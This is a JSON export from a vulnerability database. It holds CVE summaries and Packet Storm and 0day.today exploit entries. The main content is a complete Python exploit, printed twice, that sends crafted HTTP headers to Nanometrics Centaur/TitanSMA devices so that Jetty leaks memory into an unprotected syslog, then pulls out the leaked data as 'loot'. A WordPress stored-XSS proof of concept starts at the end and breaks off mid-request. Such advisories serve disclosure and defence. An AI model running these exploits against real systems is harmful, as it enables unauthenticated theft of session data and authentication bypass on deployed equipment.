{"id": "SECURITYVULNS:VULN:11008", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2010-07-18T00:00:00", "modified": "2010-07-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11008", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:24270", "https://vulners.com/securityvulns/securityvulns:doc:24271"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:37", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "c6f6fcc8d3e63fc0bce704800e7e5ce8"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "f693a90d39ab065c9ba80d6d95d4b362"}, {"key": "modified", "hash": "2a282cf33acfcad76ffdd1fec84c0639"}, {"key": "published", "hash": "2a282cf33acfcad76ffdd1fec84c0639"}, {"key": "references", "hash": "d4c35f77d0771fd8254132139e417d60"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "9caff91e9ebcf551c6d0d9d96b286138"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "47143764d5432c4be9319622a3a400b18321147ee96896137285d2ea814d567d", "viewCount": 1, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2018-08-31T11:09:37"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1", "OPENSUSE-SU-2019:1437-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-32825", "1337DAY-ID-32767", "1337DAY-ID-32728", "1337DAY-ID-32726", "1337DAY-ID-32721", "1337DAY-ID-32675", "1337DAY-ID-32678"]}, {"type": "thn", "idList": ["THN:2A7DE929E5909B366E6F490ABBF0A6C1"]}, {"type": "threatpost", "idList": ["THREATPOST:720727931BBA026660C91151A9F50C2F"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}, {"type": "zeroscience", "idList": ["ZSL-2019-5518"]}], "modified": "2018-08-31T11:09:37"}, "vulnersScore": 3.0}, "objectVersion": "1.3", "affectedSoftware": [{"name": "Conpresso CMS", "operator": "eq", "version": "4.1"}, {"name": "Redshop", "operator": "eq", "version": "1.0"}]}

{"cve": [{"lastseen": "2020-02-20T13:35:04", "bulletinFamily": "NVD", "description": "The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in FreeBSD through 10.1 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message.", "modified": "2020-02-20T04:15:00", "published": "2020-02-20T04:15:00", "id": "CVE-2015-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2923", "title": "CVE-2015-2923", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:39:30", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the __dn_expand function in network/dn_expand.c in musl libc 1.1x before 1.1.2 and 0.9.13 through 1.0.3 allow remote attackers to (1) have unspecified impact via an invalid name length in a DNS response or (2) cause a denial of service (crash) via an invalid name length in a DNS response, related to an infinite loop with no output.", "modified": "2020-02-20T04:15:00", "id": "CVE-2014-3484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3484", "published": "2020-02-20T04:15:00", "title": "CVE-2014-3484", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:35:09", "bulletinFamily": "NVD", "description": "Buffer overflow in the afReadFrames function in audiofile (aka libaudiofile and Audio File Library) allows user-assisted remote attackers to cause a denial of service (program crash) or possibly execute arbitrary code via a crafted audio file, as demonstrated by sixteen-stereo-to-eight-mono.c.", "modified": "2020-02-19T21:20:00", "id": "CVE-2015-7747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7747", "published": "2020-02-19T21:15:00", "title": "CVE-2015-7747", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:36:29", "bulletinFamily": "NVD", "description": "OverlayFS in the Linux kernel before 3.0.0-16.28, as used in Ubuntu 10.0.4 LTS and 11.10, is missing inode security checks which could allow attackers to bypass security restrictions and perform unauthorized actions.", "modified": "2020-02-19T18:50:00", "id": "CVE-2012-0055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0055", "published": "2020-02-19T18:15:00", "title": "CVE-2012-0055", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:36:40", "bulletinFamily": "NVD", "description": "Nokogiri before 1.5.4 is vulnerable to XXE attacks", "modified": "2020-02-19T15:19:00", "published": "2020-02-19T15:15:00", "id": "CVE-2012-6685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6685", "title": "CVE-2012-6685", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:38:02", "bulletinFamily": "NVD", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "modified": "2020-02-19T15:15:00", "published": "2020-02-19T15:15:00", "id": "CVE-2013-5581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5581", "title": "CVE-2013-5581", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-19T13:06:45", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi.", "modified": "2020-02-18T17:59:00", "id": "CVE-2013-2679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2679", "published": "2020-02-18T17:15:00", "title": "CVE-2013-2679", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-19T13:03:21", "bulletinFamily": "NVD", "description": "OpenPAM Nummularia 9.2 through 10.0 does not properly handle the error reported when an include directive refers to a policy that does not exist, which causes the loaded policy chain to no be discarded and allows context-dependent attackers to bypass authentication via a login (1) without a password or (2) with an incorrect password.", "modified": "2020-02-18T17:59:00", "id": "CVE-2014-3879", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3879", "published": "2020-02-18T17:15:00", "title": "CVE-2014-3879", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-19T13:03:22", "bulletinFamily": "NVD", "description": "Multiple argument injection vulnerabilities in Ansible before 1.6.7 allow remote attackers to execute arbitrary code by leveraging access to an Ansible managed host and providing a crafted fact, as demonstrated by a fact with (1) a trailing \" src=\" clause, (2) a trailing \" temp=\" clause, or (3) a trailing \" validate=\" clause accompanied by a shell command.", "modified": "2020-02-18T15:17:00", "id": "CVE-2014-4967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4967", "published": "2020-02-18T15:15:00", "title": "CVE-2014-4967", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-19T13:03:22", "bulletinFamily": "NVD", "description": "Ansible before 1.6.7 does not prevent inventory data with \"{{\" and \"lookup\" substrings, and does not prevent remote data with \"{{\" substrings, which allows remote attackers to execute arbitrary code via (1) crafted lookup('pipe') calls or (2) crafted Jinja2 data.", "modified": "2020-02-18T15:17:00", "id": "CVE-2014-4966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4966", "published": "2020-02-18T15:15:00", "title": "CVE-2014-4966", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-02-20T07:06:03", "bulletinFamily": "exploit", "description": "", "modified": "2020-02-19T00:00:00", "published": "2020-02-19T00:00:00", "id": "PACKETSTORM:156414", "href": "https://packetstormsecurity.com/files/156414/Nanometrics-Centaur-4.3.23-Memory-Leak.html", "title": "Nanometrics Centaur 4.3.23 Memory Leak", "type": "packetstorm", "sourceData": "`# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak \n# Date: 2020-02-15 \n# Author: byteGoblin \n# Vendor: https://www.nanometrics.ca \n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# CVE: N/A \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \n#!/usr/bin/env python3 \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156414/nanometricscentaur4323-leak.txt"}, {"lastseen": "2020-02-18T06:47:25", "bulletinFamily": "exploit", "description": "", "modified": "2020-02-17T00:00:00", "published": "2020-02-17T00:00:00", "id": "PACKETSTORM:156387", "href": "https://packetstormsecurity.com/files/156387/Nanometrics-Centaur-TitanSMA-Unauthenticated-Remote-Memory-Leak.html", "title": "Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak", "type": "packetstorm", "sourceData": "`Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \nAdvisory ID: ZSL-2020-5562 \nType: Local/Remote \nImpact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information \nRisk: (5/5) \nRelease Date: 15.02.2020 \n \nSummary \n \nThe Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. \n \nThe TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. \nDescription \nAn information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. \n \nVendor \n \nNanometrics Inc. - https://www.nanometrics.ca \n \nAffected Version \n \nCentaur <= 4.3.23 \nTitanSMA <= 4.2.20 \nTested On \nJetty 9.4.z-SNAPSHOT \n \nVendor Status \n \n[10.02.2020] Vulnerabilities discovered. \n[10.02.2020] Vendor contacted. \n[14.02.2020] No response from the vendor. \n[15.02.2020] Public security advisory released. \n \nPoC \n \n#!/usr/bin/env python3 \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n \nCredits \n \nVulnerability discovered by byteGoblin - <bytegoblin@zeroscience.mk> \n \nReferences \n \n[1] https://nvd.nist.gov/vuln/detail/CVE-2015-2080 \n[2] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php \n \nChangelog \n \n[15.02.2020] - Initial release \n \nContact \n \nZero Science Lab \n \nWeb: http://www.zeroscience.mk \ne-mail: lab@zeroscience.mk \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156387/ZSL-2020-5562.txt"}], "zdt": [{"lastseen": "2020-02-21T03:19:43", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2020-02-18T00:00:00", "published": "2020-02-18T00:00:00", "id": "1337DAY-ID-33983", "href": "https://0day.today/exploit/description/33983", "title": "Wordpress Strong Testimonials 2.40.1 Plugin - Persistent Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting\r\n# Vendor Homepage: https://strongtestimonials.com\r\n# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt\r\n# Exploit Author: Jinson Varghese Behanan\r\n# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/\r\n# Author Homepage: https://www.jinsonvarghese.com\r\n# Version: 2.40.0 and below\r\n# CVE : CVE-2020-8549\r\n\r\n# 1. Description\r\n# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with \r\n# over 90,000 active installations. In the client details section which is seen when adding \r\n# or editing a testimonial, the custom[client_name] and custom[company_name] parameters \r\n# were found to be vulnerable to stored cross-site scripting. All WordPress websites \r\n# using Strong Testimonials version 2.40.0 and below are affected.\r\n\r\n2. Proof of Concept\r\n\r\nWhen the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed.\r\n\r\nThe payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.\r\n\r\nPOST /wp-admin/post.php HTTP/1.1\r\nHost: testing.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 